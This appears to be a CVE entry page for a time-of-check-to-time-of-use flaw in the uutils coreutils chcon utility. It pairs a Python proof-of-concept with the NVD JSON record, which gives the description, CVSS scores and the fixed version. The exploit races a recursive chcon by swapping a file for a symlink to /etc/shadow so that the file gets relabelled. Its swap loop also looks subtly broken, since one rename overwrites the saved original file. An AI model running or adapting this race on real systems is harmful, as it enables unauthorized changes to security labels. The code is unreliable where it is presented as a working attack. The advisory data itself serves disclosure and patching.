CVE-2026-35376

import os import subprocess import threading import time # PoC for CVE-2026-35376: TOCTOU in uutils chcon # This script attempts to race the chcon utility by swapping a file # with a symlink to a sensitive target during recursive traversal. TARGET_DIR = "test_chcon_dir" SAFE_FILE = "safe.txt" SYMLINK_TARGET = "/etc/shadow" # Sensitive file to relabel TEMP_FILE = "temp_exchange" def setup(): """Create the directory structure for testing.""" if not os.path.exists(TARGET_DIR): os.makedirs(TARGET_DIR) with open(os.path.join(TARGET_DIR, SAFE_FILE), 'w') as f: f.write("innocent data") def race_exploit(): """Continuously swap the file to hit the TOCTOU window.""" print("[+] Starting race thread...") while True: try: # Rename the safe file out of the way os.rename(os.path.join(TARGET_DIR, SAFE_FILE), os.path.join(TARGET_DIR, TEMP_FILE)) # Place a symlink to the sensitive target os.symlink(SYMLINK_TARGET, os.path.join(TARGET_DIR, SAFE_FILE)) # Quickly swap back (or rotate) to maintain plausible structure os.rename(os.path.join(TARGET_DIR, SAFE_FILE), os.path.join(TARGET_DIR, TEMP_FILE)) os.rename(os.path.join(TARGET_DIR, TEMP_FILE), os.path.join(TARGET_DIR, SAFE_FILE)) except Exception as e: pass def trigger_vulnerability(): """Simulate the privileged chcon recursive operation.""" print("[+] Triggering chcon recursive operation...") # Note: This requires a context where chcon is actually running # and SELinux is enforcing. This is a simulation of the command. cmd = ["chcon", "-R", "-t", "etc_t", TARGET_DIR] # In a real scenario, this might be called by a cron job or script try: subprocess.run(cmd, check=True) except FileNotFoundError: print("chcon command not found, skipping execution.") except subprocess.CalledProcessError: print("chcon failed, expected if not root or SELinux disabled.") if __name__ == "__main__": setup() # Start the race condition thread attacker_thread = threading.Thread(target=race_exploit) attacker_thread.daemon = True attacker_thread.start() # Give the thread a moment to start time.sleep(0.1) # Trigger the vulnerable command trigger_vulnerability() print("[+] Exploit attempt finished.") print("[!] Check if /etc/shadow label has been modified.")

{"cve": {"id": "CVE-2026-35376", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:42.430", "lastModified": "2026-05-04T19:06:31.930", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Time-of-Check to Time-of-Use (TOCTOU) vulnerability exists in the chcon utility of uutils coreutils during recursive operations. The implementation resolves recursive targets using a fresh path lookup (via fts_accpath) rather than binding the traversal and label application to the specific directory state encountered during traversal. Because these operations are not anchored to file descriptors, a local attacker with write access to a directory tree can exploit timing-sensitive rename or symbolic link races to redirect a privileged recursive relabeling operation to unintended files or directories. This vulnerability breaks the hardening expectations for SELinux administration workflows and can lead to the unauthorized modification of security labels on sensitive system objects."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.0, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:L", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.0, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:*:*:*:*:*:rust:*:*", "versionEndExcluding": "0.8.0", "matchCriteriaId": "2365DBBD-6F10-4651-8DA4-08AE79E14423"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/pull/11402", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/uutils/coreutils/releases/tag/0.8.0", "source": "[email protected]", "tags": ["Release Notes"]}]}}